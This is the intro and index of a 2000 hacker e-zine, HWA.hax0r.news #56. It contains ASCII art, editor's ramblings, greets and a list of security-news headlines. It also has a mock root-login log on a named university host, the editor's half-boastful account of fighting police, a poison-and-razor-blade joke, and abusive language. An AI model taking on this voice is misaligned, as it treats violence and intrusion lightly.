       20-NOV-2000    SR500  --  SR Telecom  --  V4.9      *13:19:31
       User name :                       Log-in menu



                              User name :HWA

                              Password :0WNZU


       YYZ NOV 200 REV B

       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-
       ==                    <=-[ HWA.hax0r.news ]-=>                   ==  
       ===================================================================
       [=HWA 2000=]     Number 56 Volume 2 Issue *666  *May-Nov 2000    ==
       ===================================================================

      *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS ***      
      *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS ***
      
      NOV 22 2000      NOV 22 2000      NOV 22 2000      NOV 22 2000
      
      Dates are askew, and its a bit jumbled, normal service will resume
      shortly, please take a seat and stand back from the doors. #57 is
      already in progress and in more order, we'll back track later if it
      is possible and fill in the gap in the history coverage a LOT has 
      happened not covered in this issue, excuse the mess. - Ed
      
      
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Unix Guru Sex;
      
      "" talk;touch;finger;unzip;strip;mount;fsck;more;fsck;fsck;more;yes;yes;
         more;fsck;fsck;yes;yes;yes;umount;sleep "" ...
       
       Possible errors;
         
       aborted;child process killed;warning rogue children
       I/O error: device too small
       module not found: insmod penis
       
       tnx to PP/M/#???
       
       
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       
       
      *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS ***
      
      *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS ***
      
      *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS ***
               
    
      You have connected from: r00t3d@well.some.highspeed.net
    
      For assistance call 864-0110 or to report network problems call 864-0200
    
      Login as 'kufacts' for access to the Campus Wide Information System.
               'lynx' for access to the World Wide Web using Lynx.
               'www' for access to the World Wide Web using Lynx.
               'linemode' for access to the World Wide Web using Line Mode.
               'history' for history network resources.
               'ex-ussr' for former Soviet Union info.
     
      At password prompt hit enter.
    
      Digital UNIX (raven.cc.ukans.edu) (ttyp0)
    
      login: root
      Password:
      Last   successful login for kufacts: Sat Oct 23 13:52:10 2000 from is-nulab-pc14.unl.edu
      Last unsuccessful login for kufacts: Fri Apr 11 21:28:26 2000 on ttyp6
    
    
    
      Your Terminal type is unknown!
    
      Enter a terminal type: [vt100]
    
      TERMINAL TYPE IS SET TO vt100
      
      The University of Kansas raven.
                                                
      Connection closed by foreign host.
      # _
                                                
 
      [15:59] <FPatWORK> Unexpected socket error: 10038, SSHSocketv2.cpp: 305
      [16:00] <FPatWORK> are there expected errors?      

      
        [X]  Anarchist party (sic)
       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-
       ==                    <=-[ HWA.hax0r.news ]-=>                   ==  
       ===================================================================
       [=HWA 2000=]     Number 56 Volume 2 Issue *666  *May-Nov 2000    ==
       ===================================================================
       
                             "ABUSUS NON TOLLIT USUM"                          
       
                 *666 READ NOTES ON COVERAGE AND THE HIATUS BELOW
       
       ===================================================================

             
       "ABANDON HOPE ALL YE WHO ENTER HERE..."  - dante's inferno
                       
         "because if big brother isn't looking after us, civilization will 
          cease to exist. Or something." - someone 
          
               
                        
                                                                            
                                 ud$$$**$$$$$$$bc.                          
                              u@**"        4$$$$$$$Nu                       
                            J                ""#$$$$$$r                     
                           @                       $$$$b                    
                         .F                        ^*3$$$                   
                        :% 4                         J$$$N                  
                        $  :F                       :$$$$$                  
                       4F  9                       J$$$$$$$                 
                       4$   k             4$$$$bed$$$$$$$$$                 
                       $$r  'F            $$$$$$$$$$$$$$$$$r                
                       $$$   b.           $$$$$$$$$$$$$$$$$N                
                       $$$$$k 3eeed$$b    $$$Euec."$$$$$$$$$                
        .@$**N.        $$$$$" $$$$$$F'L $$$$$$$$$$$  $$$$$$$                
        :$$L  'L       $$$$$ 4$$$$$$  * $$$$$$$$$$F  $$$$$$F         edNc   
       @$$$$N  ^k      $$$$$  3$$$$*%   $F4$$$$$$$   $$$$$"        d"  z$N  
       $$$$$$   ^k     '$$$"   #$$$F   .$  $$$$$c.u@$$$          J"  @$$$$r 
       $$$$$$$b   *u    ^$L            $$  $$$$$$$$$$$$u@       $$  d$$$$$$ 
        ^$$$$$$.    "NL   "N. z@*     $$$  $$$$$$$$$$$$$P      $P  d$$$$$$$ 
           ^"*$$$$b   '*L   9$E      4$$$  d$$$$$$$$$$$"     d*   J$$$$$r   
                ^$$$$u  '$.  $$$L     "#" d$$$$$$".@$$    .@$"  z$$$$*"     
                  ^$$$$. ^$N.3$$$       4u$$$$$$$ 4$$$  u$*" z$$$"          
                    '*$$$$$$$$ *$b      J$$$$$$$b u$$P $"  d$$P             
                       #$$$$$$ 4$ 3*$"$*$ $"$'c@@$$$$ .u@$$$P               
                         "$$$$  ""F~$ $uNr$$$^&J$$$$F $$$$#                 
                           "$$    "$$$bd$.$W$$$$$$$$F $$"                   
                             ?k         ?$$$$$$$$$$$F'*                     
                              9$$bL     z$$$$$$$$$$$F                       
                               $$$$    $$$$$$$$$$$$$                        
                                '#$$c  '$$$$$$$$$"                          
                                 .@"#$$$$$$$$$$$$b                          
                               z*      $$$$$$$$$$$$N.                       
                             e"      z$$"  #$$$k  '*$$.                     
                         .u*      u@$P"      '#$$c   "$$c                   
                  u@$*"""       d$$"            "$$$u  ^*$$b.               
                :$F           J$P"                ^$$$c   '"$$$$$$bL        
               d$$  ..      @$#                      #$$b         '#$       
               9$$$$$$b   4$$                          ^$$k         '$      
                "$$6""$b u$$                             '$    d$$$$$P      
                  '$F $$$$$"                              ^b  ^$$$$b$       
                   '$W$$$$"                                'b@$$$$"         
                                                            ^$$$*  Gilo95'                      

     NOTE ABOUT THIS RELEASE: *666  >>>READ<<<<
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     There has been just MUCH too much stuff released to possibly cover
     but we'll try if time permits, maybe if i end up in jail i'll use
     the time to complete archives of back issues on my assault charges.
     sigh...

     NOTE#1

     ORIGINAL PLAN: (Is this it? :[  ] YES [ X] NO )      
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     OUR LAST RELEASE was number 53 Volume 2 Issue 5 so we will be releasing      
     TWO versions in a short time, one will be old news near the date of our 
     last release (this one) the other will be NEW news (current material) the 
     GAP? will be filled in later so issues 54 and probably 57 will be released 
     close to gether with the gap we missed during the archive's hiatus covered 
     at a LATER DATE (hopefully, thats the plan anyways.).

     
     NOTE#2

     POSSIBLY WHAT YOU ARE READING:(Or is it this? [ X] YES [  ] NO)      
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     IT IS POSSIBLE YOU ARE HOLDING A HALLOWEEN HELLBOUND VERSION THAT WILL BE      
     AN UNOFFICIAL OR INCOMPLETE COMPENDIUM OF PAST EVENTS *WITH* THE GAP IN 
     COVERAGE, (U'LL KNOW UNLESS YER DUMB OR BORED IN WHICH CASE THIS IS ALL 
     MOOT) IF SUCH IS THE CASE YOU"LL SEE OLD NEWS A WEIRD GAP OF MASSIVE 
     PROPORTIONS (MONTHS) AND THEN BOOM, RECENT AND INTERESTING (PRESUMEABLY) 
     MATERIAL NEAR THE MIDDLE OR END. GOOD LUCK KNOWLEDGE SEEKER, IT IS ALL HERE 
     IF YOU LOOK DEEP ENOUGH, SADLY OLD URLS DIE QUICKLY (ANOTHER GOOD REASON 
     FOR A WORK SUCH AS THIS) SO YOU MAY JUST GET THE HNN SNIPPETS OR HNS 
     WRITEUPS BUT NOT THE FULL ARTICLES TO WHICH YOU ARE ACCUSTOMED.MY 
     APPOLOGIES FOR THE MESS AND INDECISION, I AIM TO PLEASE AS MANY PPL AS 
     POSSIBLE (MAINLY ME) AND THEREFORE NO GUARENTEES ARE IMPLIED AS TO THE 
     TIMELINESS OR CONSISTENCY OF CONTENT. SUGGEST YOU ENJOY WHAT IS HERE AND 
     DONT COMPLAIN. :-O    

     

     RAMBLINGS OF SOME IMPORTANCE (PROBABLY SHOULD READ EM)      
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Once again although referred to as a 'Zine' this is in fact a chronicle or      
     archive of events for any given time period starting in 1998 and following 
     through to present hence my willingness to release issues in such a weird 
     staggered manner. Get over it, you'll live.

     This has several aspects of a zine, some original content (minor) some      
     exclusive interviews, and logs that will not be found elsewhere but it's 
     main purpose for being IS and ALWAYS HAS BEEN to act as a reference work 
     covering as much of the underground and borderline security group releases 
     as possible (the 'zine' is mostly a one man job and therefore seldom 
     complete or covering items as extensively as i'd like) it tends to be an 
     overwhelming and large work whenever it is undertaken but the releases are 
     enjoyed by many making it worth my effort (i'm doing this mainly for my own 
     purposes still btw) and those few dissenters that do emerge are either 
     jealous, people turned down for membership in the HWA group or just plain 
     "dont get it" and can in fact fuck off and die for all I care petulant 
     children and those of bloated egos...  

      Anyway with that nonesense said and this little minor irritation and this      
      explanation out of the way please read on and enjoy what content i've 
      decided to include this issue, including releases from the newly formed 
      HWA Security team (main reason for the hiatus) and check our new site 
      often as a new format is due to be implemented and many new projects of 
      wonder and awe are in the works to be released, check it often and your 
      input in all aspects of our group endeavours are encouraged. We currently 
      number 27 in official active members these are NOT currently (soon) 
      involved in producing this work but I intend to bring some that are of 
      like mind on board to help produce this monstrosity and terrorise small 
      children and sysadmins for many a year to come.

     - Dribbled from Cruci's mind Oct 30th 2000

     
     P.S Do you like how i fluctuate the number of idents from issue to issue? I 
     dont but it annoys some people and I take pleasure in their squirming. 
     Sorry for those caught in the cross fire.

     RECENT EVENTS: (FACT or FICTION? only the chosen KNOW for sure)      
     ~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     RECENT FACTORS AFFECTING THE WAY THIS WAS PRODUCED:
          

     Sept 23rd FPROPHET AND DICENTRA TIED THE KNOT and got married, congrats!      
     same nite:Cruciphux goes to jail charged with assault police officer and 
     disturbing the peace (k i got drunk and some peopl hassled me coz of my 
     purple hair i ended up fighting three cops and paying the price.) 24hrs in 
     jail, more time in jail likely when trial is over (i beat up three cops, 
     sigh, NOI recommended people.)

     Sometime  digitized pic of Cruci after his beating by the cops is 
     circulated                among select people on EFnet.NO you cant request 
     a copy.I'm not proud of what happened it was a fuck up. I fought the law 
     and the law won...

     Sept 26th Cruci in hospital for a week with infected arm (dont ask) another                
     dumb incident, drugs are bad kiddies stick to pez and beer!                    

     Oct 30th  Court date: put over to Nov 20th possibility of no jail and 
     merely                probation although one officer almost had his leg 
     broken. (Oh ya dont get on my bad side)

     Oct 31st  Arranged poison and razor blades ready for Halloween night and 
     the                black mass held each samhain in my coven (not).          
     
     Nov 20th Cruci faced 2yrs in jail and $2000 CDN fine but thanks to a good
     lawyer and due to adult situational extenuating circumstances recieved a
     suspended sentence and 18 months probation. More details? dont ask. Be
     nice to cops kids, be sure those ppl in plain clothes aren't the fuzz!

   
     ~~~~~~~~ _ _    _  __     _ _  __ _   _      _  ___ _ ~~~~~~~~~~~~~~~~~~~~~~

              Inspirational music: NiN, Marilyn Manson, Killdozer                             
              movies: Not the Ninth Gate Not mission to mars maybe The Haunting 
              The Exorcist, Pitch Black See a trend?                                          

     ~~~~~~~~ _ _    _  __     _ _  __ _   _      _  ___ _~~~~~~~~~~~~~~~~~~~~~~~

                   
     

      [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]
      
      
      
            ____   _    ____  _____ _   _ _____  _    _
           |  _ \ / \  |  _ \| ____| \ | |_   _|/ \  | |
           | |_) / _ \ | |_) |  _| |  \| | | | / _ \ | |
           |  __/ ___ \|  _ <| |___| |\  | | |/ ___ \| |___
           |_| /_/   \_\_| \_\_____|_| \_| |_/_/   \_\_____|
               _    ______     _____ ____   ___  ______   __              
              / \  |  _ \ \   / /_ _/ ___| / _ \|  _ \ \ / /
             / _ \ | | | \ \ / / | |\___ \| | | | |_) \ V /
            / ___ \| |_| |\ V /  | | ___) | |_| |  _ < | |
           /_/   \_\____/  \_/  |___|____/ \___/|_| \_\|_|

             __ ___
            / |( _ )   _
            | |/ _ \ _| |_
            | | (_) |_   _|
            |_|\___/  |_|
      
      [     WARNING                                                           ]
      [     HALLOWEEN/XMAS EDITION 2000                                       ]
      [     EXPLICIT CONTENT                                                  ]
      [     THIS PRODUCT MAY BE HARMFUL OR FATAL IF INFO IS USED              ]
      [     BY YOUNG SCRIPT KIDDIES TO ATTACK OR COMPROMISE SERVERS           ]
      [     DO NOT INTENTIONALLY CONCENTRATE AND INHALE PRODUCT.              ]      
      
      
      
      [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]
    
                            _   _ _______        __
                           | \ | | ____\ \      / /
                           |  \| |  _|  \ \ /\ / /
                           | |\  | |___  \ V  V /
                          _|_| \_|_____|__\_/\_/__  __
                         |  _ \ / _ \| __ ) / _ \ \/ /
                         | |_) | | | |  _ \| | | \  /
                         |  __/| |_| | |_) | |_| /  \
                         |_|    \___/|____/ \___/_/\_\

      
      [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]
      
      
      WE HAVE AN UPDATED MAIL DROP ADDRESS:
      
      HWA 
      P.O BOX 44118
      POSTAL OUTLET UNIT #9
      ONE WEXFORD ROAD
      BRAMPTON, ONTARIO
      CANADA
      L6Z 4V7
      
    
     [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] 
     
    
    

     PRELUDE
     ~~~~~~~
                           
     On a popular breakfast cereal:          
              
     The reason it's called "Grape Nuts" is that it contains "dextrose",
     which is also sometimes called "grape sugar", and also because
     "Grape Nuts" is catchier, in terms of marketing, than "A Cross
     Between Gerbil Food and Gravel", which is what it tastes like.
    
                                 - Dave Barry, "Tips for Writer's:
                  
              
              
              
        .,-*-,._.,-*'^'~*-,._.,-*~> *1 <~*-,._.,-*~'^'~*-,._.,-*-,.             
       
             
    HACKING sensibilities do not limit themselves to the realms of computer 
    or telephone networks they also extend into art and musical expression
    I coaxed one of our members to share an exerpt of the lyrics from the
    title track of their latest cd release (translated from Croatian). - Ed
    
    
      .,-*-,._.,-*'^'~*-,._.,-*~> *1 <~*-,._.,-*~'^'~*-,._.,-*-,.       
             
             
             "Narko"
              
             "U'r opening the window for a perfect day"
             "just like a scene from hollywood movies"
             "where luck goes in wawes"
             "where dust covers all the questions"
             "ooooo am I that old that U forget"
             "ooooois he that brawe that he takes U
             "that why there are words"
             "for U to lie with them to me"
             "that's why hope exsiste"
             "for say once again"
             "In my dreams I go to U"
             "In my dreams I always go to U"
             "In my dreams I alwaysgo to U"

             
             Pips, chips & Videoclips
             (c) 2000  
             
                      
   ========================================================================== 
                                                       
                                                        
    entropy (ntr-p) 
    n., pl. entropies. 

     1.Symbol S For a closed thermodynamic system, a quantitative measure of
       the amount of thermal energy not available to do work. 
     2.A measure of the disorder or randomness in a closed system. 
     3.A measure of the number of bits necessary to transmit a message as a 
       function of the probability that the message will consist of a specific
       set of symbols. 
   >>4.A hypothetical tendency for all matter and energy in the universe to 
       evolve toward a state of inert uniformity. 
   >>5.Inevitable and steady deterioration of a system or society.                                                         
  
                          ____  _____ ____ ___ _   _
                         | __ )| ____/ ___|_ _| \ | |
                         |  _ \|  _|| |  _ | ||  \| |
                         | |_) | |__| |_| || || |\  |
                         |____/|_____\____|___|_| \_|
                         
                         
     [root@antiv0re]# whatis life
     life: nothing appropriate                    
     [root@antiv0re]# gcc -o god god.c
     [root@antiv0re]# ./god
     [root@antiv0re]# make clean
     [root@antiv0re]# make universe
     make: don't know how to make universe. Stop
     [root@antiv0re]# make dinner
     make: don't know how to make dinner. Stop
     [root@antiv0re]# 
                         
    Ok some greets...
 
    [08:54] <pr0ix> Cruciphux: leave me greets in the zine
    [08:54] <pr0ix> never dont it u gax0r
    [08:54] <pr0ix> hax0r i mean
    [08:55] <Crucitwo> haha
    [08:55] <Crucitwo> yeah i did once
    [08:55] <pr0ix> write: pr0ix still w8ing for the automatic k_____
    [08:55] <pr0ix> :=
    [08:55] <pr0ix> )
    [08:55] <Crucitwo> i took all the greets out
    [08:55] <Crucitwo> yeah ok
    [08:55] <Crucitwo> thats fair
    [08:55] <pr0ix> :)
    [08:55] <Crucitwo> where is it?                      
    
    sorry for bad grammar etc, i'm learnin a little tho.. ;)
    
  pr0ix: dont forget that automatic thingy! you'll get your kl33t HWA shirt ;)
  cpt: hiya man, stay the fuck out of trouble ok? you know what i mean.    
  KrD: Thanks for the interview, hope things work out better than recent shit.
  potgirl : geia sou file mou ;)
  slash: sta ima buraz?
  pr0ix/pek/HET/Mixter/Trudel/#informatic #??? : Bleibt cool broders!
  pip/tnc: bottoms up lads!
  
  And the rest of #darknet, #hwa-security and some other chans i wont bother
  mentioning coz they dont need the publicity.,,
  
  
  
  
                       _     _
                      | |__ (_)  _ __ ___   ___  _ __ ___
                      | '_ \| |  |'_ ` _ \ / _ \| '_ ` _ \
                      | | | | |  || | | | | (_) | | | | | |
                      |_| |_|_|  || |_| |_|\___/|_| |_| |_| ()

  
                   
    
  =-----------------------------------------------------------------------=

                         Welcome to HWA.hax0r.news ... 

  =-----------------------------------------------------------------------=
   
    
    "If life is a waste of time and time is a waste of life, then lets all get
     wasted and have the time of our lives"
    						- kf

  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]                     HWA.hax0r.news                     #666   2000  
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. LEGAL & COPYRIGHTS ..............................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. THIS IS WHO WE ARE ..............................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those  who use it properly). This is our new motto.         
             
   SKULL ASCII: Giles@gevans.demon.co.uk (Gilo)
                ==SKuLL and CroSSBonES==
                

             Wargames:http://roothat.labs.pulltheplug.com/ 

  =--------------------------------------------------------------------------=
    Source Keys                  HWA.hax0r.news                           2000  
  =--------------------------------------------------------------------------=
  
  
    "The three most dangerous things in the world are a programmer with a
     soldering iron, a hardware type with a program patch and a user with
     an idea." - Unknown
     
     [MM]  - Articles from Mass Media sources (Wired MSNBC Reuters etc)
     [IND] - Independant articles or unsolicited material.
     [HWA] - Articles or interviews by HWA Staff members
     [HNN] - Sourced from the Hacker News Network http://www.hackernews.com/
     [HNS] - Sourced from Help Net Security http://net-security.org/
     [403] - Sourced from 403-security http://www.403-security.net/
     [ISN] - Articles from the ISN Mailing list (usually sourced from media)
     [b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/
     [zsh] - ZSH release http://zsh.interniq.org/
     [COR] - Correction to previous release.
     
   =--------------------------------------------------------------------------=
    Key     Content              HWA.hax0r.news                            2000 
   =--------------------------------------------------------------------------=
       
   <someguy> only a poor workman blames his tools, unless of course those tools
             were written by Microsoft :)
   <some1>   lol
               
     

    01.0  .. GREETS ...........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ............................
     01.2 .. Mailbag ..........................................................
    02.0  .. From the Editor................................................... 
    
    Note: Contents this issue are in particular disarray and follow no real time
          line sorry about this but you should find the content interesting and
          worth reading nonetheless...C*:.    
    
    03.0  .. [HNN] May 09'00 ILOVEYOU Investigation Continues 
    04.0  .. [HNN] May 09'00 Brace Yourselves For the SuperVirus 
    05.0  .. [HNN] May 09'00 NIPC Accused of Dragging Feet 
    06.0  .. [HNN] May 09'00 Classified Systems Hit 
    07.0  .. [HNN] May 09'00 Mitnick in Online Chat 
    08.0  .. [HNN] May 09'00 Phreakers In the White House 
    09.0  .. [HNN] May 09'00 MS vs Netscape in Blame for Security Hole 
    10.0  .. [HNN] May 09'00 Hacker vs. Cracker The Debate Continues 
    11.0  .. [HNN] May 10'00 Buffer Overflow: The Name Game: Groking the Love Bug 
    12.0  .. [HNN] May 10'00 New Virus/Worm On The Loose, Friendmess.A 
    13.0  .. [HNN] May 10'00 YTCracker Busted For Web Defacement 
    14.0  ,, [HNN] May 10'00 Gov Security Laws Introduced At Summit 
    15.0  .. [HNN] May 10'00 Internet Fraud Complaint Center Launched By DoJ 
    16.0  .. [HNN] May 10'00 And Yet Another Hole Found In Hotmail 
    17.0  .. [HNN] May 11'00 Solar Sunrise, Now on Video 
    18.0  .. [HNN] May 11'00 Network Manager Sent to Jail For Destroying His Network 
    19.0  .. [HNN] May 11'00 Lawmakers Upset Over ILOVEYOU 
    20.0  .. [HNN] May 11'00 Intel Motherboards Could Destroy Files 
    21.0  .. [HNN] May 11'00 Hackers and the Tools They Use 
    22.0  .. [HNN] May 11'00 HackerNews Brazil and SecureNet Forced To Remove Content 
    23.0  .. [HNN] May 12'00 ILOVEYOU May Have Been An Accident 
    24.0  .. [HNN] May 12'00 Windows Labeled 'Virus Friendly' 
    25.0  .. [HNN] May 12'00 PBS Looses Subscriber Info 
    26.0  .. [HNN] May 12'00 Anonymous User Sues Yahoo For Releasing Identity 
    27.0  .. [HNN] May 12'00 Smart Cards Labeled Secure 
    28.0  .. [HNN] May 12'00 Cyber Attackers on Television 
    29.0  .. [HNN] May 15'00 Love Bug Suspect Denies All 
    30.0  .. [HNN] May 15'00 Microsoft Found to Be Threat to National Security 
    31.0  .. [HNN] May 15'00 G8 to Discuss Cybercrime 
    32.0  .. [HNN] May 15'00 VA Described as Wide Open To Attack 
    33.0  .. [HNN] May 15'00 Bank Web Site Breached 
    34.0  .. [HNN] May 15'00  Koreans Host 'Hacking Contest' 
    35.0  .. [HNN] May 15'00 America's Most Wanted Hit with DoS 
    36.0  .. [HNN] May 15'00 Greisling Responds 
    37.0  .. [HNN] May 17'00 Microsoft Security Spanked Again 
    38.0  .. [HNN] May 17'00 Canada's Big Brother Revealed 
    39.0  .. [HNN] May 17'00 Code on Disk Points Finger At Suspect 
    40.0  .. [HNN] May 17'00 List of ILOVEYOU Suspects Grows 
    41.0  .. [HNN] May 17'00 Return of the Phreaker 
    42.0  .. [HNN] May 17'00 Hope 2000 Announces Plans 
    43.0  .. [HNN] May 17'00 More and more E-zines 
    44.0  .. [HNN] May 18'00  UCITA May Help Computer Attackers 
    45.0  .. [HNN] May 18'00  H.R.3489 To Limit Eavesdropping 
    46.0  .. [HNN] May 18'00 Congressional Records Reveals Officers Social Security Numbers 
    47.0  .. [HNN] May 18'00 G8 Finds No Quick Fix For Cyber Crime 
    48.0  .. [HNN] May 18'00 Philippines Has No CyberCrime Law - Suspect Can Not be Prosecuted 
    49.0  .. [HNN] May 18'00 Multiple Holes Found in Kerberos 
    50.0  .. [HNN] May 18'00 Interview with OpenBSD Creator 
    51.0  .. [HNN] May 18'00 RIAA Looking For Targets     
    52.0  .. [HNN] May 18'00 Canadian BB DB Clippings 
    53.0  .. [HNN] May 19'00 NewLove - Dangerous Variant on the Loose 
    54.0  .. [HNN] May 19'00 Old CIA Head Warns of Spy-Viruses 
    55.0  .. [HNN] May 19'00 Fed Slow In Virus Reaction 
    56.0  .. [HNN] May 19'00 FCC's Attempted Expansion of CALEA In Court 
    57.0  .. [HNN] May 19'00 Russian Computer Crime on the Rise 
    58.0  .. [HNN] May 19'00 J0n Pleads Guilty in Canada 
    59.0  .. [HNN] May 19'00 Electronically Attacking a Bank 
    60.0  .. [HNN] May 22'00 NAI Removes NetBus Pro from Scanner 
    61.0  .. [HNN] May 22'00 Brits Lose Another Laptop 
    62.0  .. [HNN] May 22'00 State Department Audits Missing Laptops 
    63.0  .. [HNN] May 22'00 Researchers Develop New Breed of Security Tool 
    64.0  .. [HNN] May 22'00 Original ILOVEYOU Author Surfaces in Australia 
    65.0  .. [HNN] May 23'00 Secret Searches Reintroduced to Congress 
    66.0  .. [HNN] May 23'00 FTC Wants Control Over Privacy 
    67.0  .. [HNN] May 23'00 Computer Attackers To get Even Higher Sentences 
    68.0  .. [HNN] May 23'00 Australia Loses Sensitive Laptops 
    69.0  .. [HNN] May 23'00 Hong Kong to Create Cyber Response Team 
    70.0  .. [HNN] May 23'00 South Africa Forms CyberCrime Unit 
    71.0  .. [HNN] May 24'00 Info-Con Ratings To Be Used for Cyber Threats 
    72.0  .. [HNN] May 24'00 Ticketmaster to Sell RootFest Tickets 
    73.0  .. [HNN] May 24'00 Zero-Knowledge Teams With IBM 
    74.0  .. [HNN] May 24'00 The Little Miscreants That Could 
    75.0  .. [HNN] May 24'00 French Say No Anonymity on Web 
    76.0  .. [HNN] May 24'00 Experts Stress Education Over Laws 
    77.0  .. [HNN] May 25'00 NHL Hit with DDoS 
    78.0  .. [HNN] May 25'00 FCC Rules Under Appeal 
    79.0  .. [HNN] May 25'00 Privacy Issue Still Hot In DC 
    80.0  .. [HNN] May 25'00 Australia Electoral Information Sold For Tax Mailing 
    81.0  .. [HNN] May 25'00 Cybercops Meet in Boston 
    82.0  .. [HNN] May 25'00 CERT Releases Advisory on Week Old Issue 
    83.0  .. [HNN] May 26'00 Physical Security Is Real Weak 
    84.0  .. [HNN] May 26'00 Reno Does About Face 
    85.0  .. [HNN] May 26'00 Extortionist Busted 
    86.0  .. [HNN] May 26'00 Australian Man Leaks Sewage Via Computer and Radio 
    87.0  .. [HNN] May 26'00 2600 Keeps Lawyer 
    88.0  .. [HNN] May 26'00 Preliminary Defcon Speaking Schedule 
    89.0  .. [HNN] May 26'00 Underground Site Form Alliance 
    90.0  .. [HNN] May 30'00 Viruses, Viruses, and more Viruses 
    91.0  .. [HNN] May 30'00 Resume on the Loose
    92.0  .. [HNN] May 30'00 Gauntlet Firewall Breached 
    93.0  .. [HNN] May 30'00 Software Glitch Short Changes Lottery Winners 
    94.0  .. [HNN] May 30'00 Cyberstalking: Hype or Reality 
    95.0  .. [HNN] May 30'00 Sexy Geeks and Hackers 
    96.0  .. [HNN] May 30'00 DC Metro Web Site Defaced 
    97.0  .. [HNN] May 30'00 Mitnick to Challenge Computer Ban 
    98.0  .. [HNN] May 30'00 Black Hat Posts Speaker Lists, Adds Old Video Clips 
    99.0  .. [IND] Pokemon virus hits U.S targetting kids
   100.0  .. [HNN] May 31'00 Canada To Dismantle Big Bro Database 
   101.0  .. [HNN] May 31'00 Resume Causes Little Damage 
   102.0  .. [HNN] May 31'00 Hong Kong Pirate Piracy Troubles 
   103.0  .. [HNN] May 31'00 New Zealand Man Claims Virus Info Stolen 
   104.0  .. [HNN] May 31'00 Bank Manager Executed 
   105.0  .. [HNN] May 31'00 Malaysian ISP Suffers Human Error Security Breach 
   106.0  .. [HNN] May 31'00 Defcon Updates Web Site 
   107.0  .. [HNN] May 31'00 SWAT Hits Issue 29 
   108.0  .. [HNN] June 01'00 Pennsylvania Passes Anti-Virus Law 
   109.0  .. [HNN] June 01'00 MLB Practices Security Through Obscurity 
   110.0  .. [HNN] June 01'00 Pr0n Detection Software 
   111.0  .. [HNN] June 01'00 Fighting the Privacy Bootleggers 
   112.0  .. [HNN] June 01'00 Marcia Clark Calls Hackers "Undersocialized Schizoids" 
   113.0  .. [HNN] June 01'00 Fake Census Takers on the Prowl 
   114.0  .. [HNN] June 02'00 Top Ten Internet Security Problems 
   115.0  .. [HNN] June 02'00 MPAA Attempts to Bar Press From Hearings 
   116.0  .. [HNN] June 02'00 Anti-Virus Vendors Blame Media for Virus Hype 
   117.0  .. [HNN] June 02'00 Summercon 2000 
   118.0  .. [HNN] June 02'00 India's First Cyber Criminal Arrested 
   119.0  .. [HNN] June 02'00 Libnet for NT Now Available 
   120.0  .. [HNN] June 05'00 FW-1 Vulnerable to Fragmented Packets 
   121.0  .. [HNN] June 05'00 Australian Tax Office Sells Private Info 
   122.0  .. [HNN] June 05'00 British Have Lost Dozens of Laptops 
   123.0  .. [HNN] June 05'00 S.2448 Analysis 
   124.0  .. [HNN] June 05'00 Spammer Busted For Online Tampering 
   125.0  .. [HNN] June 05'00 Cell Phone Viruses? 
   126.0  .. [HNN] June 07'00 SPAM Worm Hits Cell Phones In Spain 
   127.0  .. [HNN] June 07'00 MafiaBoy to Get New Charges 
   128.0  .. [HNN] June 07'00 CheckPoint Posts Temp Fix for FW-1 Vulnerability 
   129.0  .. [HNN] June 07'00 Air Force Blocks Access to Museum Web Site 
   130.0  .. [HNN] June 07'00 Mounties Fall Behind Crooks in Online Crime 
   131.0  .. [HNN] June 08'00 Accused in ILOVEYOU virus case set free 
   132.0  .. [HNN] June 08'00 Kevin Mitnick Talks About Jobs in Computer Security 
   133.0  .. [HNN] June 08'00 Australia passes law legalizing government computer intrusions 
   134.0  .. [HNN] June 08'00 Press allowed to cover MPAA depositions 
   135.0  .. [HNN] June 08'00 Vulnerability in free mail services found 
   136.0  .. [HNN] June 08'00 OnStar service can unlock car doors 
   137.0  .. [HNN] June 09'00 Thousands of trojaned computers found 
